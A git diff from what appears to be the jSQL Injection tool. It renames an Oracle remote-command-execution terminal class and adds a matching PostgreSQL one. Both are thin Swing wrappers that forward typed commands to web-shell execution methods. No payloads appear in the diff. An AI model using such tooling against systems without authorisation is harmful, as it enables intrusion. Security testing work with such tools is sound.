view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java index bd7cc33201..2d99b6d260 100644 --- a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRce.java +++ b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRceOracle.java @@ -19,19 +19,19 @@ /** * A terminal for web shell injection. */ -public class ExploitRce extends AbstractExploit { +public class ExploitRceOracle extends AbstractExploit { /** * Build a webshell instance. - * @param terminalID Unique identifier to discriminate beyond multiple opened terminals + * @param terminalId Unique identifier to discriminate beyond multiple opened terminals */ - public ExploitRce(UUID terminalID) throws MalformedURLException, URISyntaxException { - super(terminalID, null, "udf"); - this.setName("udfShell"); + public ExploitRceOracle(UUID terminalId) throws MalformedURLException, URISyntaxException { + super(terminalId, null, "rce"); + this.setName("rceShell"); } @Override - public void action(String command, UUID terminalID, String urlShell, String... arg) { - MediatorHelper.model().getUdfAccess().runCommandRce(command, terminalID); + public void action(String command, UUID terminalId, String urlShell, String... arg) { + MediatorHelper.model().getUdfAccess().runCommandRceOracle(command, terminalId); } } diff --git a/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java new file mode 100644 index 0000000000..eb466395c3 --- /dev/null +++ b/view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java @@ -0,0 +1,37 @@ +/******************************************************************************* + * Copyhacked (H) 2012-2025. + * This program and the accompanying materials + * are made available under no term at all, use it like + * you want, but share and discuss it + * every time possible with every body. + * + * Contributors: + * ron190 at ymail dot com - initial implementation + ******************************************************************************/ +package com.jsql.view.swing.terminal; + +import com.jsql.view.swing.util.MediatorHelper; + +import java.net.MalformedURLException; +import java.net.URISyntaxException; +import java.util.UUID; + +/** + * A terminal for web shell injection. + */ +public class ExploitRcePostgres extends AbstractExploit { + + /** + * Build a webshell instance. + * @param terminalId Unique identifier to discriminate beyond multiple opened terminals + */ + public ExploitRcePostgres(UUID terminalId) throws MalformedURLException, URISyntaxException { + super(terminalId, null, "rce"); + this.setName("rceShell"); + } + + @Override + public void action(String command, UUID terminalId, String urlShell, String... arg) { + MediatorHelper.model().getUdfAccess().runCommandRcePostgres(command, terminalId); + } +}